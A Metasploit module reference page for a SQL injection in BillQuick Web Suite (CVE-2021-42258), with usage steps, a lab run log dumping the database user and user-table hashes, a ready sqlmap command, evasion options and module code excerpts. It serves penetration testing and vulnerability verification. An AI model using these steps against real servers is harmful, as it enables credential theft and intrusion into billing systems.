BillQuick Web Suite txtID SQLi - Metasploit


This page contains detailed information about how to use the auxiliary/gather/billquick_txtid_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: BillQuick Web Suite txtID SQLi
Module: auxiliary/gather/billquick_txtid_sqli
Source code: modules/auxiliary/gather/billquick_txtid_sqli.rb
Disclosure date: 2021-10-22
Last modification time: 2022-05-06 00:22:52 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-42258

This module exploits a SQL injection vulnerability in BillQUick Web Suite prior to version 22.0.9.1. The application is .net based, and the database is required to be MSSQL. Luckily the website gives error based SQLi messages, so it is trivial to pull data from the database. However the webapp uses an unknown password security algorithm. This vulnerability does not seem to support stacked queries. This module pulls the database name, banner, user, hostname, and the SecurityTable (user table).

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use auxiliary/gather/billquick_txtid_sqli
msf auxiliary(billquick_txtid_sqli) > show targets
    ... a list of targets ...
msf auxiliary(billquick_txtid_sqli) > set TARGET target-id
msf auxiliary(billquick_txtid_sqli) > show options
    ... show and set options ...
msf auxiliary(billquick_txtid_sqli) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


This module exploits a SQL injection vulnerability in BillQUick Web Suite prior to version 22.0.9.1. The application is .net based, and the database is required to be MSSQL. Luckily the website gives error based SQLi messages, so it is trivial to pull data from the database. However the webapp uses an unknown password security algorithm. This vulnerability does not seem to support stacked queries. This module pulls the database name, 111.111.1.111, user, hostname, and the SecurityTable (user table).

Install

This install can be rather complicated and take about 2hrs to install.

  1. Download ws2020
  2. Download Bill Quick 2020
  3. Install billquick 2020
  4. reboot
  5. Install IIS per WS2020 instructions (non-default options in ws2020 install docs)
  6. Install .NET Framework 3.5 (for sql server 2008, powershell: Install-WindowsFeature Net-Framework-Core)
  7. Install MSSQL Server 2008
  8. Install ws2020 (.NET 4.5 is bundled, may need a reboot)
  9. Open BillQuick V21 (on desktop). Configure it to a new database
  10. visit http://<ip>/ws2020 and finish the install/config

Even at this point, 2 people with these instructions and one independently were unable to login to the webapp. It can be SQLi, but no one was able to use it successfully.

Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/gather/billquick_txtid_sqli
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should get info about the system and app.

Options


HttpClientTimeout

As noted in the original discovery writeup, and verified during exploitation, the DB is very slow. A high timeout should be set. Defaults to 15

Scenarios


BillQuick Web Suite 21.0.11 with BillQuick 2020 on Windows 2012 r2 with MSSQL 2008

[*] Processing billquick.rb for ERB directives.
resource (billquick.rb)> use auxiliary/gather/billquick_txtid_sqli
resource (billquick.rb)> set rhosts 111.111.1.111
rhosts => 111.111.1.111
resource (billquick.rb)> set verbose true
verbose => true
resource (billquick.rb)> check
[*] 111.111.1.111:80 - The target appears to be vulnerable. Version Detected: 21.0.11
resource (billquick.rb)> exploit
[*] Running module against 111.111.1.111
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 21.0.11
[*] Getting Variables
[*] VIEWSTATE: /wEPDwULLTE4MzE3MTAzMjcPZBYEAgMPDxYCHgRUZXh0BRJWZXJzaW9uOiAyMS4wLjExLjFkZAIFD2QWBgIDD2QWBgIDDw9kFgIeBGhyZWYFKWphdmFzY3JpcHQ6RGlzcGxheUhlbHAoJy9sb2dpbi5odG0nLHRydWUpZAIFDw8WAh8AZWRkAgsPD2QWAh8BBboCamF2YXNjcmlwdDpPcGVuQ3VzdG9taXplZFBhZ2UoJ2h0dHA6Ly8xOTIuMTY4LjIuMTk3OjgwL3dzMjAyMC9BZG1pbi9mcm1TdGFydHVwT3B0aW9ucy5hc3B4P1JldHVyblVSTD1odHRwOi8vMTkyLjE2OC4yLjE5Nzo4MC93czIwMjAvZGVmYXVsdC5hc3B4JlJldHVyblBhdGg9QzovUHJvZ3JhbSBGaWxlcyAoeDg2KS9CaWxsUXVpY2sgV2ViIFN1aXRlL1dlYiBTdWl0ZSAyMDIwL3B1YmxpYycsJ09wdGlvbnMnLCdzdGF0dXM9MSx0b3A9MjAsbGVmdD03MCx0b29sYmFyPTAsd2lkdGg9OTYwLGhlaWdodD04NTAsc2Nyb2xsYmFycz0xLHJlc2l6YWJsZT0xJylkAgcPDxYCHgdWaXNpYmxlaGQWBAIBDxAPFgIfAmhkZGRkAgMPDxYCHwJoZGQCCQ9kFgICAw8PZBYCHgdvbmNsaWNrBYQBSmF2YVNjcmlwdDp2YXIgTnduZD0gd2luZG93Lm9wZW4oJ2h0dHA6Ly93d3cuYnFlLmNvbS9SZWFkeVRvQnV5LmFzcCcsJ0JpbGxRdWljaycsJ3N0YXR1cz0xLHJlc2l6YWJsZT0xJyk7IE53bmQuZm9jdXMoKTtyZXR1cm4gZmFsc2U7ZGStCLctJcrVYJp1DAA1gC3rEarKhZr4l+UhXjrUi4Di4g==
[*] VIEWSTATEGENERATOR: 35DBDDBD
[*] EVENTVALIDATION: /wEdAAdXT9yBxJ2SJPiixQkGOgS3iDzhgTayErTY5zy3eV0+KFncozjiY2uerT4fyhfyLsuRO4wbr9XDALim0BHyPei6XNiiK4rX19Q4jotFU35tutB+E+wdjwdLhtRmnvNWW5XjXQFozpEkqmpvVssmq69gY0kE5exFACTMA+fC7OwSIZ2agMpDV5u2LIZn3ODypK4=
[+] Current Database: test
[+] 111.111.1.111: Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) 
        Jul  9 2008 14:17:44 
        Copyright (c) 1988-2008 Microsoft Corporation
        Developer Edition (64-bit) on Windows NT 6.2 \u003cX64\u003e (Build 9200: ) (VM)

[+] DB User: sa
[+] Hostname: WIN-EDKFSE5QPAB
[+] User Count in test.dbo.SecurityTable: 2
[+] Username: 111
[+] User 111 settings: D848281C|1|1|1|0|1|1|1|0|1|1|1|1|1|1|1|1|1|1|0|0|0|1|0|1|0|0|0|1|1|1|0|0|0|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0|0|0|0|0|0|0|
[+] Username: fl
[+] User fl settings: 45E97|1|1|1|0|1|1|1|0|1|1|1|1|1|1|1|1|1|1|0|0|0|1|0|1|0|0|0|1|1|1|0|0|0|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0|0|0|0|0|0|0|
[+] test.dbo.SecurityTable
======================

 EmployeeID  Settings
 ----------  --------
 111         D848281C|1|1|1|0|1|1|1|0|1|1|1|1|1|1|1|1|1|1|0|0|0|1|0|1|0|0|0|1|1|1|0|0|0|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0|0|0|0|0|0|0|
 fl          45E97|1|1|1|0|1|1|1|0|1|1|1|1|1|1|1|1|1|1|0|0|0|1|0|1|0|0|0|1|1|1|0|0|0|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0|0|0|0|0|0|0|

[*] Default password is the username.
[*] Auxiliary module execution completed
resource (billquick.rb)> hosts

Hosts
=====

address        mac  name             os_name  os_flavor  os_sp  purpose  info                                                                                                             comments
-------        ---  ----             -------  ---------  -----  -------  ----                                                                                                             --------
111.111.1.111       WIN-EDKFSE5QPAB  Windows                    device   Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) Jul  9 2008 14:17:44 Copyright (c) 1988-2008 Microsoft Cor
                                                                         porationDeveloper Edition (64-bit) on Windows NT 6.2 \u003cX64\u003e (Build 9200: ) (VM)

resource (billquick.rb)> services
Services
========

host           port  proto  name                 state  info
----           ----  -----  ----                 -----  ----
111.111.1.111  80    tcp    BillQuick Web Suite  open

resource (billquick.rb)> creds
Credentials
===========

host           origin         service                       public  private   realm  private_type        JtR Format
----           ------         -------                       ------  -------   -----  ------------        ----------
111.111.1.111  111.111.1.111  80/tcp (BillQuick Web Suite)  sa                       Blank password      
111.111.1.111  111.111.1.111  80/tcp (BillQuick Web Suite)  111     D848281C         Nonreplayable hash  
111.111.1.111  111.111.1.111  80/tcp (BillQuick Web Suite)  fl      45E97            Nonreplayable hash  

resource (billquick.rb)> notes

Notes
=====

 Time                     Host           Service              Port  Protocol  Type      Data
 ----                     ----           -------              ----  --------  ----      ----
 2021-11-06 10:26:28 UTC  111.111.1.111  BillQuick Web Suite  80    tcp       database  "test"

SQLMap Equivalent


You'll need a valid VIEWSTATE, VIEWSTATEGENERATOR, EVENTVALIDATION.

sqlmap -u "http://[IP]/ws2020/default.aspx" -f txtID --data="__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=[VIEWSTATE]&__VIEWSTATEGENERATOR=[GENERATOR]&__EVENTVALIDATION=[VALIDATION]&txtID=a&txtPW=a&hdnClientDPI=96" --dbms MSSQL --time-sec 15 --batch

Go back to menu.

Msfconsole Usage


Here is how the gather/billquick_txtid_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/billquick_txtid_sqli

msf6 auxiliary(gather/billquick_txtid_sqli) > show info

       Name: BillQuick Web Suite txtID SQLi
     Module: auxiliary/gather/billquick_txtid_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2021-10-22

Provided by:
  h00die
  Caleb Stewart <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /ws2020/         yes       The URI of BillQuick Web Suite
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a SQL injection vulnerability in BillQUick Web 
  Suite prior to version 22.0.9.1. The application is .net based, and 
  the database is required to be MSSQL. Luckily the website gives 
  error based SQLi messages, so it is trivial to pull data from the 
  database. However the webapp uses an unknown password security 
  algorithm. This vulnerability does not seem to support stacked 
  queries. This module pulls the database name, banner, user, 
  hostname, and the SecurityTable (user table).

References:
  https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
  http://billquick.net/download/Support_Download/BQWS2021Upgrade/WebSuite2021LogFile_9_1.pdf
  https://nvd.nist.gov/vuln/detail/CVE-2021-42258

Module Options


This is a complete list of options available in the gather/billquick_txtid_sqli auxiliary module:

msf6 auxiliary(gather/billquick_txtid_sqli) > show options

Module options (auxiliary/gather/billquick_txtid_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /ws2020/         yes       The URI of BillQuick Web Suite
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/billquick_txtid_sqli auxiliary module:

msf6 auxiliary(gather/billquick_txtid_sqli) > show advanced

Module advanced options (auxiliary/gather/billquick_txtid_sqli):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   AutoCheck             true                                                no        Run check before exploit
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit          false                                               no        Override check result
   HttpClientTimeout     15                                                  no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto
                                                                                       , TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/billquick_txtid_sqli module can do:

msf6 auxiliary(gather/billquick_txtid_sqli) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/billquick_txtid_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/billquick_txtid_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

55:	    begin
56:	      res = send_request_cgi({
57:	        'uri' => normalize_uri(target_uri.path, 'default.aspx'),
58:	        'method' => 'GET'
59:	      }, datastore['HttpClientTimeout'])
60:	      return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
61:	      return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
62:	
63:	      %r{Version: (?<version>\d{1,2}\.\d{1,2}\.\d{1,2})\.\d{1,2}</span>} =~ res.body
64:	
65:	      if version && Rex::Version.new(version) <= Rex::Version.new('22.0.9.1')

<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>


Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:

56:	      res = send_request_cgi({
57:	        'uri' => normalize_uri(target_uri.path, 'default.aspx'),
58:	        'method' => 'GET'
59:	      }, datastore['HttpClientTimeout'])
60:	      return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
61:	      return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
62:	
63:	      %r{Version: (?<version>\d{1,2}\.\d{1,2}\.\d{1,2})\.\d{1,2}</span>} =~ res.body
64:	
65:	      if version && Rex::Version.new(version) <= Rex::Version.new('22.0.9.1')
66:	        return Exploit::CheckCode::Appears("Version Detected: #{version}")

Version Detected: <VERSION>


Here is a relevant code snippet related to the "Version Detected: <VERSION>" error message:

61:	      return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
62:	
63:	      %r{Version: (?<version>\d{1,2}\.\d{1,2}\.\d{1,2})\.\d{1,2}</span>} =~ res.body
64:	
65:	      if version && Rex::Version.new(version) <= Rex::Version.new('22.0.9.1')
66:	        return Exploit::CheckCode::Appears("Version Detected: #{version}")
67:	      end
68:	    rescue ::Rex::ConnectionError
69:	      return Exploit::CheckCode::Unknown("#{peer} - Could not connect to the web service")
70:	    end
71:	    Exploit::CheckCode::Safe("Unexploitable Version: #{version}")

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

64:	
65:	      if version && Rex::Version.new(version) <= Rex::Version.new('22.0.9.1')
66:	        return Exploit::CheckCode::Appears("Version Detected: #{version}")
67:	      end
68:	    rescue ::Rex::ConnectionError
69:	      return Exploit::CheckCode::Unknown("#{peer} - Could not connect to the web service")
70:	    end
71:	    Exploit::CheckCode::Safe("Unexploitable Version: #{version}")
72:	  end
73:	
74:	  def rand_chars(len = 6)

Unexploitable Version: <VERSION>


Here is a relevant code snippet related to the "Unexploitable Version: <VERSION>" error message:

66:	        return Exploit::CheckCode::Appears("Version Detected: #{version}")
67:	      end
68:	    rescue ::Rex::ConnectionError
69:	      return Exploit::CheckCode::Unknown("#{peer} - Could not connect to the web service")
70:	    end
71:	    Exploit::CheckCode::Safe("Unexploitable Version: #{version}")
72:	  end
73:	
74:	  def rand_chars(len = 6)
75:	    Rex::Text.rand_text_alpha(len)
76:	  end

(?<error>[^


Here is a relevant code snippet related to the "(?<error>[^" error message:

78:	  def char_list(string)
79:	    ('char(' + string.split('').map(&:ord).join(')+char(') + ')').to_s
80:	  end
81:	
82:	  def error_info(body)
83:	    /BQEShowModalAlert\('Information','(?<error>[^']+)/ =~ body
84:	    error
85:	  end
86:	
87:	  def inject(content, state, generator, validation)
88:	    res = send_request_cgi({

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

98:	        'txtPW' => '',
99:	        'hdnClientDPI' => '96'
100:	      }
101:	    }, datastore['HttpClientTimeout'])
102:	
103:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
104:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
105:	    res.body
106:	  end
107:	
108:	  def run

<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>


Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:

99:	        'hdnClientDPI' => '96'
100:	      }
101:	    }, datastore['HttpClientTimeout'])
102:	
103:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
104:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
105:	    res.body
106:	  end
107:	
108:	  def run
109:	    vprint_status('Getting Variables')

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

110:	    res = send_request_cgi({
111:	      'uri' => normalize_uri(target_uri.path, 'default.aspx'),
112:	      'method' => 'GET'
113:	    }, datastore['HttpClientTimeout'])
114:	
115:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
116:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
117:	
118:	    /id="__VIEWSTATE" value="(?<viewstate>[^"]+)/ =~ res.body
119:	    /id="__VIEWSTATEGENERATOR" value="(?<viewstategenerator>[^"]+)/ =~ res.body
120:	    /id="__EVENTVALIDATION" value="(?<eventvalidation>[^"]+)/ =~ res.body

<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>


Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:

111:	      'uri' => normalize_uri(target_uri.path, 'default.aspx'),
112:	      'method' => 'GET'
113:	    }, datastore['HttpClientTimeout'])
114:	
115:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
116:	    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
117:	
118:	    /id="__VIEWSTATE" value="(?<viewstate>[^"]+)/ =~ res.body
119:	    /id="__VIEWSTATEGENERATOR" value="(?<viewstategenerator>[^"]+)/ =~ res.body
120:	    /id="__EVENTVALIDATION" value="(?<eventvalidation>[^"]+)/ =~ res.body
121:	    unless viewstate && viewstategenerator && eventvalidation

Unable to find viewstate, viewstategenerator, and eventvalidation values.


Here is a relevant code snippet related to the "Unable to find viewstate, viewstategenerator, and eventvalidation values." error message:

117:	
118:	    /id="__VIEWSTATE" value="(?<viewstate>[^"]+)/ =~ res.body
119:	    /id="__VIEWSTATEGENERATOR" value="(?<viewstategenerator>[^"]+)/ =~ res.body
120:	    /id="__EVENTVALIDATION" value="(?<eventvalidation>[^"]+)/ =~ res.body
121:	    unless viewstate && viewstategenerator && eventvalidation
122:	      fail_with(Failure::UnexpectedReply, 'Unable to find viewstate, viewstategenerator, and eventvalidation values.')
123:	    end
124:	    vprint_status("VIEWSTATE: #{viewstate}")
125:	    vprint_status("VIEWSTATEGENERATOR: #{viewstategenerator}")
126:	    vprint_status("EVENTVALIDATION: #{eventvalidation}")
127:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • h00die
  • Caleb Stewart <caleb.stewart94[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.